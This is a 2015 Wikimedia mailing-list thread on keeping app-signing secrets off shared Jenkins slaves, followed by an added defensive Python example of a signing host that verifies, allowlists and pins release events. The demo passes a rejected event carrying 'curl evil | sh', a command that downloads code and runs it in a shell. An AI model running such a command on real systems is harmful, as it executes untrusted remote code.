[QA] Keeping secrets safe on Jenkins

Stephen Niedzielski sniedzielski at wikimedia.org
Wed Aug 19 18:34:11 UTC 2015


  Good point, Brian! Our teams and, as I mentioned earlier, I think other
teams must have very similar needs. One huge distinction between Android
and iOS is the platform requirement. As far as I know, the iOS app can only be
built on OS X but the Android app builds on Linux, OS X, and Windows.
However, I think Android should prefer to use Linux since that's what most
of the infrastructure uses.

  In the absence of a preexisting solution, I would like to submit a ticket.
Are there any recommendations on how I should go about this and how to
figure out if getting a release server is something that can even be done
this fiscal year? It's worth mentioning that in addition to internal
solutions, we would be open to discussing a trusted third party SaaS
provider if that's more practical. Thanks!


--stephen


On Thu, Aug 13, 2015 at 4:42 AM, Brian Gerstle <bgerstle at wikimedia.org>
wrote:

> Good discussion! iOS is interested in how this goes, as we'd also like to
> package, sign, and deploy our app securely. Our current setup lives on our
> private, OS X Jenkins server which is only accessible on WMF networks. It's
> not versioned in any way, though it could be (using Ansible or
> Boxen/puppet).
>
> Android was considering using the Mac Mini at some point. If we're the
> only two teams that need this environment at present, should we try to use
> the same machine, or at least hardware/config?
>
>
> On Wednesday, August 12, 2015, Stephen Niedzielski <
> sniedzielski at wikimedia.org> wrote:
>
>>   Thanks for the info, Dan! Assuming we went this route, what do we use
>> to manage private production configurations? Is there a project that would
>> be a good template I could check out? I would ignorantly guess that we
>> probably have at least a couple ultra secure machines somewhere and am
>> trying to come up to speed with how these are versioned and maintained, and
>> the general infrastructure available.
>>
>>
>> --stephen
>>
>> On Wed, Aug 12, 2015 at 6:32 PM, Dan Duvall <dduvall at wikimedia.org>
>> wrote:
>>
>>> On Wed, Aug 12, 2015 at 4:05 PM, Stephen Niedzielski <
>>> sniedzielski at wikimedia.org> wrote:
>>>
>>>>   Assuming a better solution does not exist, I _think_ what I'm
>>>> ultimately asking for is a Zuul managed / JJB maintained private Jenkins
>>>> instance only accessible over SSH, if that makes sense. Is there anything
>>>> like that? There must be other teams in the foundation that need a secure
>>>> release job and we could either leverage their solution or they ours.
>>>>
>>>
>>> There's a fundamental problem with signing on a Jenkins slave, private
>>> or shared, in that it will trust and execute anything the master gives it.
>>> It's also possible that the master (and other slaves by extension) is
>>> vulnerable to slave response forgery as well.[1]
>>>
>>> I think to do automated signing right, we'd want to start with a
>>> dedicated production host that independently polls/listens for CR events
>>> and executes only tightly reviewed jobs that are outside the realm of our
>>> CI Zuul/Jenkins altogether. Whether this would be another, completely
>>> private, Jenkins /cluster/ or something lighter, I'm not sure.
>>>
>>> [1]
>>> https://groups.google.com/d/topic/jenkinsci-users/W5dKc06l1qs/discussion
>>>
>>> --
>>> Dan Duvall
>>> Automation Engineer
>>> Wikimedia Foundation <http://wikimediafoundation.org>
>>>
>>>
>>
>>
>
> --
> EN Wikipedia user page: https://en.wikipedia.org/wiki/User:Brian.gerstle
> IRC: bgerstle
>
>
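The dedicated signing host Dan describes, made concrete as an added example (not code from this thread or from Wikimedia): the host polls an event source instead of taking work from a CI master, accepts only events it can authenticate (an HMAC over the event with a secret shared with the event source, a hypothetical Gerrit hook here), maps the project name to a fixed, reviewed job instead of executing anything the event carries, pins the build to a commit sha rather than a branch name, and signs with a key that never leaves the host. The secrets, project name, event shape and build recipe are constructed; HMAC stands in for the real APK signing step so the example runs stand-alone.

```python
"""Signing host that runs only reviewed jobs on authenticated release events.

Added example; not Wikimedia code. The contrast with a Jenkins slave is
that nothing in the incoming event is executable: the event only selects
a job that already exists, reviewed, on this host.
"""
import hashlib
import hmac
import json
import re

# Secrets that live only on the signing host. Constructed values; in a real
# deployment they come from the host's keystore and are never given to CI.
EVENT_SECRET = b"constructed-webhook-secret-shared-only-with-the-event-source"
RELEASE_KEY = b"constructed-release-key-stand-in-for-the-apk-keystore"

COMMIT_SHA = re.compile(r"^[0-9a-f]{40}$")
# The only fields a release event may carry. A script, command line or
# shell snippet in the event is rejected, never executed.
EVENT_SCHEMA = {"type", "project", "commit"}


def canonical(event):
    """Stable byte encoding so both sides MAC exactly the same bytes."""
    return json.dumps(event, sort_keys=True, separators=(",", ":")).encode()


def mac_event(event, secret=EVENT_SECRET):
    """HMAC the event source (hypothetical Gerrit hook) attaches to an event."""
    return hmac.new(secret, canonical(event), hashlib.sha256).hexdigest()


def build_android(commit):
    """Stand-in for the reviewed build recipe (e.g. a release gradle task run
    on a fresh checkout of the pinned commit). Returns the artifact bytes."""
    return b"apk-built-from-" + commit.encode()


# Reviewed jobs are fixed code on this host, selected by project name only.
JOBS = {
    "apps/android/wikipedia": build_android,
}


def sign_artifact(artifact):
    """Detached signature with the host-held key. HMAC stands in for
    apksigner / codesign so the example runs without a keystore."""
    digest = hashlib.sha256(artifact).hexdigest()
    sig = hmac.new(RELEASE_KEY, digest.encode(), hashlib.sha256).hexdigest()
    return {"sha256": digest, "signature": sig}


def verify_release(artifact, release):
    """Check a release record against the artifact bytes."""
    expected = sign_artifact(artifact)
    return hmac.compare_digest(expected["signature"], release["signature"])


def handle_event(event, presented_mac):
    """Process one polled event; raise on anything that is not a clean,
    authenticated request to release a pinned commit of an allowlisted project."""
    if not hmac.compare_digest(mac_event(event), presented_mac):
        raise PermissionError("event not authenticated by the event source")
    if set(event) != EVENT_SCHEMA:
        raise ValueError("event carries fields outside the schema")
    if event["type"] != "change-merged":
        raise ValueError("only merged changes are released")
    if event["project"] not in JOBS:
        raise PermissionError("project is not allowlisted for signing")
    if not COMMIT_SHA.fullmatch(event["commit"]):
        raise ValueError("ref must be a pinned commit sha, not a branch or tag name")
    artifact = JOBS[event["project"]](event["commit"])
    release = sign_artifact(artifact)
    release["commit"] = event["commit"]
    return artifact, release


def decide(event, presented_mac):
    """Poll-loop wrapper: a bad event is logged and skipped, never fatal."""
    try:
        return "signed", handle_event(event, presented_mac)[1]
    except (PermissionError, ValueError) as exc:
        return "rejected", str(exc)


if __name__ == "__main__":
    # Constructed event as the hook would deliver it after a merge.
    event = {"type": "change-merged", "project": "apps/android/wikipedia",
             "commit": "0123456789abcdef0123456789abcdef01234567"}
    print(decide(event, mac_event(event)))
    print(decide(dict(event, command="curl evil | sh"), mac_event(event)))
```

The order of checks matters: authentication comes first so that nothing about an unauthenticated event, not even its shape, influences the host; the schema check then refuses executable content even from a compromised but correctly keyed event source; and the commit-sha rule removes the branch-moves-after-review race. The key stays in `RELEASE_KEY` on this host and is only ever applied to output of a job in `JOBS`.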